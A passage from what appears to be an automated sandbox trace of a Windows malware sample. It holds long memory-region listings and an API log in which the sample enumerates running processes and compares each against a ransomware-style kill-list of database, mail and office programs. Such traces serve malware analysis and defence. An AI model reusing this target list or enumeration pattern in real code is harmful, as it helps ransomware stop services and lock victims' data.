0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5176 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5177 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5178 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5179 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5180 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5181 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5182 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5183 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5184 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5185 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5186 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5187 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5188 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5189 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5190 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5191 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5192 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5193 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5194 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5195 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5196 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5197 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5198 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5199 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5200 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5201 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5202 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5203 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5204 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5205 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5206 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5207 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5208 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5209 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5210 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5211 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5212 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5213 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5214 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5215 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5216 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5217 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5218 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5219 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5220 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5221 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5222 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5223 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5224 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5225 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5226 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5227 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5228 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5229 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5230 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5231 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5232 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5233 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5234 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5235 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 5236 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 5237 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 5238 start_va = 0x3b80000 end_va = 0x3c80fff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 5239 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5240 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5241 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5242 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5243 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5244 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5245 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5246 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5247 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5248 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5249 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5250 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5251 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5252 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5253 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5254 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5255 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5256 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5257 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5258 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5259 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5260 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5261 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5262 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5263 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5264 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5265 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5266 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5267 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5268 start_va = 0x2f50000 end_va = 0x2f50fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 5269 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 5270 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 5271 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 5272 start_va = 0x3250000 end_va = 0x330ffff entry_point = 0x0 region_type = private name = "private_0x0000000003250000" filename = "" Region: id = 5273 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5274 start_va = 0x73bf0000 end_va = 0x73d31fff entry_point = 0x73bf0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 5275 start_va = 0x2ec0000 end_va = 0x2ec0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ec0000" filename = "" Region: id = 5276 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5277 start_va = 0x2ed0000 end_va = 0x2ed0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ed0000" filename = "" Region: id = 5278 start_va = 0x2ef0000 end_va = 0x2ef3fff entry_point = 0x2ef0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 5279 start_va = 0x2f70000 end_va = 0x2fb2fff entry_point = 0x2f70000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000b.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000b.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000b.db") Region: id = 5280 start_va = 0x2f30000 end_va = 0x2f33fff entry_point = 0x2f30000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 5281 start_va = 0x3250000 end_va = 0x32dafff entry_point = 0x3250000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 5282 start_va = 0x3300000 end_va = 0x330ffff entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 5283 start_va = 0x32e0000 end_va = 0x32f0fff entry_point = 0x32e0000 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 5284 start_va = 0x2f50000 end_va = 0x2f53fff entry_point = 0x2f50000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 5285 start_va = 0x3310000 end_va = 0x3322fff entry_point = 0x3310000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001a.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db") Region: id = 5286 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003030000" filename = "" Region: id = 5287 start_va = 0x75030000 end_va = 0x75065fff entry_point = 0x75030000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5288 start_va = 0x3330000 end_va = 0x336ffff entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 5289 start_va = 0x3870000 end_va = 0x396ffff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 5290 start_va = 0x7f6f7000 end_va = 0x7f6f9fff entry_point = 0x0 region_type = private name = "private_0x000000007f6f7000" filename = "" Region: id = 5866 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 5867 start_va = 0x2ec0000 end_va = 0x2ec2fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 6036 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 6037 start_va = 0x2ec0000 end_va = 0x2ec2fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 6040 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 6041 start_va = 0x2ec0000 end_va = 0x2ec2fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 6042 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 6043 start_va = 0x2ec0000 end_va = 0x2ec2fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 6066 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 6067 start_va = 0x2ec0000 end_va = 0x2ec2fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 6068 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 6069 start_va = 0x2ec0000 end_va = 0x2ec2fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 6070 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 6071 start_va = 0x2ec0000 end_va = 0x2ec2fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 6072 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 6073 start_va = 0x2ec0000 end_va = 0x2ec2fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 6117 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 6118 start_va = 0x2ec0000 end_va = 0x2ec2fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 6130 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 6131 start_va = 0x2ec0000 end_va = 0x2ec2fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 6132 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 6133 start_va = 0x2ec0000 end_va = 0x2ec2fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 6154 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 6155 start_va = 0x2ec0000 end_va = 0x2ec2fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 6156 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 6157 start_va = 0x2ec0000 end_va = 0x2ec2fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 6158 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 6159 start_va = 0x2ec0000 end_va = 0x2ec2fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Thread: id = 1 os_tid = 0xe18 [0036.029] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0036.029] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0036.029] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0036.029] VerifyVersionInfoW (in: lpVersionInformation=0xdcf6c0, dwTypeMask=0x23, dwlConditionMask=0x1801b | out: lpVersionInformation=0xdcf6c0) returned 1 [0036.029] GetCurrentProcess () returned 0xffffffff [0036.029] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xdcf7d8 | out: TokenHandle=0xdcf7d8*=0x180) returned 1 [0036.029] GetTokenInformation (in: TokenHandle=0x180, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xdcf7dc | out: TokenInformation=0x0, ReturnLength=0xdcf7dc) returned 0 [0036.029] GetLastError () returned 0x7a [0036.029] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0xf6a0e0 [0036.029] GetTokenInformation (in: TokenHandle=0x180, TokenInformationClass=0x19, TokenInformation=0xf6a0e0, TokenInformationLength=0x14, ReturnLength=0xdcf7dc | out: TokenInformation=0xf6a0e0, ReturnLength=0xdcf7dc) returned 1 [0036.029] GetSidSubAuthorityCount (pSid=0xf6a0e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0xf6a0e9 [0036.029] GetSidSubAuthority (pSid=0xf6a0e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0xf6a0f0 [0036.029] LocalFree (hMem=0xf6a0e0) returned 0x0 [0036.030] CloseHandle (hObject=0x180) returned 1 [0036.030] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x180 [0036.037] VirtualAlloc (lpAddress=0x0, dwSize=0x22c, flAllocationType=0x3000, flProtect=0x4) returned 0xe10000 [0036.038] Process32FirstW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0036.039] lstrcmpiW (lpString1="msftesql.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="sqlagent.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="sqlbrowser.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="sqlwriter.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="oracle.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="ocssd.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="dbsnmp.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="synctime.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="agntsvc.exeisqlplussvc.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="xfssvccon.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="sqlservr.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="mydesktopservice.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="ocautoupds.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="agntsvc.exeagntsvc.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="agntsvc.exeencsvc.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="firefoxconfig.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="tbirdconfig.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="mydesktopqos.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="ocomm.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="mysqld.exe", lpString2="[System Process]") returned 1 [0036.041] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="[System Process]") returned 1 [0036.042] lstrcmpiW (lpString1="mysqld-opt.exe", lpString2="[System Process]") returned 1 [0036.042] lstrcmpiW (lpString1="dbeng50.exe", lpString2="[System Process]") returned 1 [0036.042] lstrcmpiW (lpString1="sqbcoreservice.exe", lpString2="[System Process]") returned 1 [0036.042] lstrcmpiW (lpString1="excel.exe", lpString2="[System Process]") returned 1 [0036.042] lstrcmpiW (lpString1="infopath.exe", lpString2="[System Process]") returned 1 [0036.042] lstrcmpiW (lpString1="msaccess.exe", lpString2="[System Process]") returned 1 [0036.042] lstrcmpiW (lpString1="mspub.exe", lpString2="[System Process]") returned 1 [0036.042] lstrcmpiW (lpString1="onenote.exe", lpString2="[System Process]") returned 1 [0036.042] lstrcmpiW (lpString1="outlook.exe", lpString2="[System Process]") returned 1 [0036.042] lstrcmpiW (lpString1="powerpnt.exe", lpString2="[System Process]") returned 1 [0036.042] lstrcmpiW (lpString1="steam.exe", lpString2="[System Process]") returned 1 [0036.042] lstrcmpiW (lpString1="sqlservr.exe", lpString2="[System Process]") returned 1 [0036.042] lstrcmpiW (lpString1="thebat.exe", lpString2="[System Process]") returned 1 [0036.042] lstrcmpiW (lpString1="thebat64.exe", lpString2="[System Process]") returned 1 [0036.042] lstrcmpiW (lpString1="thunderbird.exe", lpString2="[System Process]") returned 1 [0036.042] lstrcmpiW (lpString1="visio.exe", lpString2="[System Process]") returned 1 [0036.042] lstrcmpiW (lpString1="winword.exe", lpString2="[System Process]") returned 1 [0036.042] lstrcmpiW (lpString1="wordpad.exe", lpString2="[System Process]") returned 1 [0036.042] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x64, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0036.043] lstrcmpiW (lpString1="msftesql.exe", lpString2="System") returned -1 [0036.043] lstrcmpiW (lpString1="sqlagent.exe", lpString2="System") returned -1 [0036.043] lstrcmpiW (lpString1="sqlbrowser.exe", lpString2="System") returned -1 [0036.043] lstrcmpiW (lpString1="sqlwriter.exe", lpString2="System") returned -1 [0036.043] lstrcmpiW (lpString1="oracle.exe", lpString2="System") returned -1 [0036.043] lstrcmpiW (lpString1="ocssd.exe", lpString2="System") returned -1 [0036.043] lstrcmpiW (lpString1="dbsnmp.exe", lpString2="System") returned -1 [0036.043] lstrcmpiW (lpString1="synctime.exe", lpString2="System") returned -1 [0036.043] lstrcmpiW (lpString1="agntsvc.exeisqlplussvc.exe", lpString2="System") returned -1 [0036.043] lstrcmpiW (lpString1="xfssvccon.exe", lpString2="System") returned 1 [0036.043] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0036.043] lstrcmpiW (lpString1="mydesktopservice.exe", lpString2="System") returned -1 [0036.043] lstrcmpiW (lpString1="ocautoupds.exe", lpString2="System") returned -1 [0036.043] lstrcmpiW (lpString1="agntsvc.exeagntsvc.exe", lpString2="System") returned -1 [0036.043] lstrcmpiW (lpString1="agntsvc.exeencsvc.exe", lpString2="System") returned -1 [0036.043] lstrcmpiW (lpString1="firefoxconfig.exe", lpString2="System") returned -1 [0036.044] lstrcmpiW 